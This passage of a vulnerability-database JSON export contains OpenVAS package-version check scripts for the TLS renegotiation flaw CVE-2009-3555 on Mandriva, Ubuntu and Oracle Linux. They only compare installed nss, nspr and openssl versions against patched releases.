2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00000.php\");\n script_id(830970);\n script_version(\"$Revision: 8109 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-14 07:31:15 +0100 (Thu, 14 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:069\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Mandriva Update for nss MDVSA-2010:069 (nss)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnspr4\", rpm:\"libnspr4~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnspr-devel\", rpm:\"libnspr-devel~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nspr\", rpm:\"nspr~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr4\", rpm:\"lib64nspr4~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nspr-devel\", rpm:\"lib64nspr-devel~4.8.4~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", rpm:\"lib64nss-static-devel~3.12.6~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:05:54", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-990-1", "modified": "2018-01-23T00:00:00", "published": "2010-09-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840505", "id": "OPENVAS:1361412562310840505", "title": "Ubuntu Update for openssl vulnerability USN-990-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_990_1.nasl 8495 2018-01-23 07:57:49Z teissa $\n#\n# Ubuntu Update for openssl vulnerability USN-990-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3\n protocols. If an attacker could perform a man in the middle attack at the\n start of a TLS connection, the attacker could inject arbitrary content at\n the beginning of the user's session. This update adds backported support\n for the new RFC5746 renegotiation extension and will use it when both the\n client and the server support it.\n\n ATTENTION: After applying this update, a patched server will allow both\n patched and unpatched clients to connect, but unpatched clients will not be\n able to renegotiate. For more information, please refer to the following:\n http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html\n http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-990-1\";\ntag_affected = \"openssl vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-990-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840505\");\n script_version(\"$Revision: 8495 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 08:57:49 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-27 08:14:44 +0200 (Mon, 27 Sep 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"USN\", value: \"990-1\");\n script_cve_id(\"CVE-2009-3555\");\n script_name(\"Ubuntu Update for openssl vulnerability USN-990-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl-doc\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8g-16ubuntu3.2\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8a-7ubuntu0.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8a-7ubuntu0.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8a-7ubuntu0.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8a-7ubuntu0.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8a-7ubuntu0.12\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl-doc\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-udeb\", ver:\"0.9.8k-7ubuntu8.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl-doc\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8g-15ubuntu3.5\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openssl-doc\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8g-4ubuntu3.10\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2010-0164", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122382", "title": "Oracle Linux Local Check: ELSA-2010-0164", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0164.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122382\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:17:53 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0164\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0164 - openssl097a security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0164\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0164.html\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"openssl097a\", rpm:\"openssl097a~0.9.7a~9.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2018-01-18T11:05:22", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-927-1", "modified": "2018-01-17T00:00:00", "published": "2010-04-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840416", "id": "OPENVAS:1361412562310840416", "title": "Ubuntu Update for nss vulnerability USN-927-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: 